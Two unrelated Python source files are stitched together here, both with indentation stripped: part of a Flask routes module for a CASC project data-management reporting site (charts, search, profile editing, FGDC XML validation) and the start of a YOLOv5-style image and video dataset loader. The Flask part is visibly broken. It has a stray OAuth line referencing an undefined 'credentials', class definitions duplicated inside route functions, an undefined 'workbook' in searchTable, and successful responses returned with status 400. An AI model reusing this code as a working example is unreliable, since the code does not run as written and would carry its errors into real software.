i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or i.history.isspace() or\
i.history == "":
i.history = "No data steward \
history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential\
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not currently \
tracked by \
Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project', project['proj_id'],
project['fy_id'],
project['casc_id']
)
projects.append(new_obj.__dict__)
return render_template("verticalbar.html", projects=projects)
@bp.route('/horizontalbar')
def horizontalbar():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project)\
.filter(Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
try:
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
except Exception:
pass
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(credentials)
try:
try:
# DMP Status
i.dmp_status = \
sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data \
steward history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not \
currently tracked \
by Data Steward"
except Exception:
pass
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login to \
view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project',
project['proj_id'],
project['fy_id'],
project['casc_id'])
projects.append(new_obj.__dict__)
return render_template("horizontalbar.html", projects=projects)
@bp.route('/treemap')
def treemap():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data \
steward history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not \
currently tracked by Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project',
project['proj_id'],
project['fy_id'],
project['casc_id'])
projects.append(new_obj.__dict__)
return render_template("treemap.html", projects=projects)
@bp.route('/user/<username>')
@login_required
def user(username):
"""Load user and render user.html template if found, else 404."""
# Change to lowercase to make case insensitive
user = User.query.filter_by(username=username.lower()).first_or_404()
admin_email = current_app.config['ADMINS'][0]
return render_template('user.html', user=user, adminEmail=admin_email)
@bp.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
"""Define form for editing a profile."""
form = EditProfileForm(current_user.username)
if form.validate_on_submit():
if form.username.data:
current_user.username = str(form.username.data).lower()
if form.about.data:
current_user.about = str(form.about.data)
if form.email.data:
current_user.email = str(form.email.data)
if form.password.data:
# current_user.password = str(form.password.data)
user = current_user
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('main.user',
username=current_user.username)), 400
elif request.method == 'GET':
form.username.data = current_user.username
form.about.data = current_user.about
form.email.data = current_user.email
return render_template(
'edit_profile.html',
title='Edit Profile', form=form), 400
@bp.route('/search', methods=['GET', 'POST'])
@login_required
def search():
current_user.search_form = SearchForm()
d = str(current_user.search_form.data['search'])
if(len(d) == 0):
message = ["Please Enter The Keyword To Search"]
return render_template('error.html',
message=message, length=len(d)), 400
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))) .all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["sbId"] = i.sb_id
user["summary"] = i.summary
add_user(user)
return render_template('searchTree.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchBar/<query>', methods=['GET', 'POST'])
@login_required
def searchBar(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata, length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))) .all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
add_user(user)
return render_template('search_results.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchBack/<query>', methods=['GET', 'POST'])
@login_required
def searchBack(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata, length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))) .all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
add_user(user)
return render_template('searchTree.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchTable/<query>', methods=['GET', 'POST'])
@login_required
def searchTable(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata,
length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))) .all()
length = len(courses)
userdata = []
def add_user(user):
userdata.append(user)
sheet = {}
for i in courses:
user = {}
user["name"] = i.projectTitle
user['sb_id'] = i.sb_id
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
user['pi_list'] = i.PI
user['summary'] = i.summary
user['url'] = i.url
user['ctitle'] = i.title
user['xml'] = i.xml_urls
if(i.xml_urls == ''):
# print("no data")
user['xml'] = "Metadata Unavailable for this DataItem"
user['error'] = "No Validations"
user['curl'] = "No Xml Link Found"
else:
doc = etree.parse(path_to_static +
'FGDC-BDP/fgdc-std-001.1-1999.xsd')
schema = etree.XMLSchema(doc)
# parse the url and convert to xml file
url1 = str(i.xml_urls)
URL = url1.split(',')[0]
user['curl'] = URL
# print(URL)
try:
response = requests.get(URL)
with open(path_to_static + 'feed.xml', 'wb') as file:
file.write(response.content)
# Schema to be validated.
custom = etree.parse(path_to_static + 'feed.xml')
# Validate Schema
user['xml'] = schema.validate(custom)
# print(schema.validate(custom))
def get_project(error):
# return error.path.split('/')[-1]
return error.message.split(':')[0].split(" ")[1].strip()
# If errors, we will find it in schema.error_log
user['error'] = []
for error in schema.error_log:
# Mutiple attribute available in error
# 'column', 'domain', 'domain_name',
# 'filename', 'level', 'level_name'
# 'line', 'message', 'path', 'type', 'type_name'
error1 = str(error.message),
"Error in Line Number: "+str(error.line)
# print('ErrorMessage',error.message)
user['error'].append(error1)
result = {}
for error1 in schema.error_log:
project = get_project(error1)
if project not in result:
result[project] = 0
result[project] += 1
# print(error.message)
# print(result)
user['countError'] = str(result)
except Exception:
user['cxml'] = "URL Associated with this \
Data Item is not working"
# print("url failed")
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
try:
# DMP Status
i.dmp_status = sheet[i.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
user["dmp_status"] = i.dmp_status
# History
i.history = sheet[i.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data steward history provided"
user['history'] = i.history
# Potential Products
i.potential_products = sheet[i.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential\
products provided"
user['potential_products'] = i.potential_products
except KeyError:
i.dmp_status = "Project not currently tracked \
by Data Steward"
i.history = "Project not currently tracked by \
Data Steward"
i.potential_products = "Project not currently tracked by \
Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
user["dmp_status"] = i.dmp_status
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
user['history'] = i.history
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
user['potential_products'] = i.potential_products
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login to view this content."
i.file_breakdown = []
add_user(user)
return render_template('searchTableChart.html', query=d, courses=courses,
length=length, userdata=userdata)
# adding new code Burst and Trends.html
@bp.route('/trends', methods=['GET', 'POST'])
def trends():
return render_template('trends.html')
@bp.route('/bursts', methods=['GET', 'POST'])
def bursts():
return render_template('bursts.html')
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
